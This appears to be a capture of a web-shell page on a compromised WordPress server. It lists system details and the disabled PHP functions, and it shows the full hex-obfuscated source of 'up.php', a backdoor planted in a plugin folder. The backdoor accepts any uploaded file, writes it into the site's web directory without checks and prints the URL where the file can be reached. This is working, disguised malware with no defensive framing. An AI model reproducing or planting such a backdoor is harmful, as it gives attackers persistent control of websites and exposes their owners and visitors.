HEX
Server: nginx/1.18.0
System: Linux iZj6c1ieg2jrpk1z5tzi19Z 6.3.9-1.el7.elrepo.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jun 21 22:18:40 EDT 2023 x86_64
User: www (1001)
PHP: 8.2.4
Disabled: passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
$ pwd: /www/wwwroot/www.cytocare.cn/wp-content/plugins/ubh/
Upload Files
File: /www/wwwroot/www.cytocare.cn/wp-content/plugins/ubh/up.php
<?php ${"GLOBAL\x53"}["\x77\x6dy\x6b\x78s\x6b\x78cy\x75\x6a"]="\x75\x72\x6c";${"GLO\x42ALS"}["\x62\x6d\x63\x74v\x77\x63"]="\x70\x61\x74h";echo "\x3c\x64i\x76\x20a\x6cig\x6e=\x22\x63\x65n\x74\x65r\x22\x3e\n\x3ci\x6dg\x20\x73r\x63=\"\x68\x74t\x70://w\x77\x77\x2eubhtea\x6d\x2eorg/\x69mage\x73/\x55BH\x46i\x6ea\x6c1.p\x6eg\x22 wi\x64\x74h\x3d\"200\" he\x69g\x68t=\x221\x35\x30\">\x3c/\x69\x6dg\x3e\x3c\x62r\x3e\n<fo\x72m act\x69\x6f\x6e=\"\x22\x20m\x65t\x68od=\"\x70\x6fst\"\x20\x65ncty\x70e=\"\x6dul\x74ipa\x72t/fo\x72\x6d-da\x74a\x22\x3e\n<l\x61\x62el\x20\x66or\x3d\"\x66i\x6ce\x22\x3eF\x69l\x65\x6ea\x6de:\x3c/\x6c\x61be\x6c\x3e\n\x3c\x69\x6ep\x75\x74\x20type=\x22f\x69\x6ce\" n\x61m\x65=\x22\x66il\x65\"\x20i\x64\x3d\x22f\x69l\x65\"\x20/\x3e\n<\x62\x72\x20/\x3e\n<i\x6e\x70\x75\x74\x20\x74y\x70e=\x22\x73ubm\x69t\"\x20\x6e\x61\x6de\x3d\"\x73\x75b\x6d\x69\x74\" v\x61\x6cue\x3d\x22\x55p\x6co\x61d\"\x3e\n\x3c/\x66\x6frm>\n</di\x76>\n";if(isset($_POST["sub\x6di\x74"])){if($_FILES["f\x69\x6c\x65"]["e\x72r\x6fr"]>0){echo"\x45\x72\x72\x6fr: ".$_FILES["f\x69\x6ce"]["err\x6f\x72"]."<\x62r />";}else{echo"\x55\x70\x6co\x61d:\x20".$_FILES["fi\x6c\x65"]["\x6e\x61\x6d\x65"]."<br\x20/>";echo"\x53\x69\x7a\x65:\x20".($_FILES["\x66il\x65"]["\x73\x69ze"]/1024)."\x20\x4bb\x3c\x62r /\x3e";echo"St\x6f\x72\x65d\x20i\x6e: ".$_FILES["\x66i\x6ce"]["\x74mp_\x6eam\x65"]."<\x62\x72\x3e";}if(file_exists("".$_FILES["f\x69\x6ce"]["\x6e\x61\x6d\x65"])){echo$_FILES["\x66i\x6ce"]["na\x6d\x65"]." a\x6c\x72\x65a\x64y\x20ex\x69\x73\x74\x73\x2e\x20";}else{$iwtdsenis="\x75rl";${"G\x4cO\x42A\x4cS"}["e\x66y\x74\x64\x69\x6f\x77t"]="\x70\x61\x74\x68";move_uploaded_file($_FILES["fi\x6ce"]["\x74\x6dp_\x6eame"],"".$_FILES["fi\x6c\x65"]["name"]);${${"\x47\x4cO\x42\x41LS"}["\x62\x6d\x63tv\x77c"]}=__dir__;${"\x47\x4cO\x42AL\x53"}["\x6f\x78xzjyqsz"]="\x70\x61\x74\x68";echo"S\x74o\x72\x65\x64 i\x6e: ".${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x65\x66\x79\x74\x64i\x6f\x77\x74"]}."/".$_FILES["f\x69\x6c\x65"]["nam\x65"]."<br>";echo"<\x68r\x3e";$chubtyhcjkr="\x70\x61\x74\x68";${$iwtdsenis}="\x68\x74\x74p://".$_SERVER["\x48\x54\x54\x50\x5f\x48O\x53T"].$_SERVER["REQ\x55ES\x54\x5f\x55RI"];${${"\x47\x4c\x4f\x42\x41LS"}["\x6f\x78\x78zj\x79\x71\x73\x7a"]}=str_replace("\x75\x70.\x70h\x70",$_FILES["\x66\x69\x6c\x65"]["\x6ea\x6d\x65"],${${"\x47\x4cO\x42\x41\x4cS"}["\x77\x6d\x79\x6bxsk\x78\x63\x79uj"]});echo"\x47o\x20\x68e\x72e\x20:\x20".${$chubtyhcjkr}."\x3c\x62r\x3e";}}
?>
@ Telegram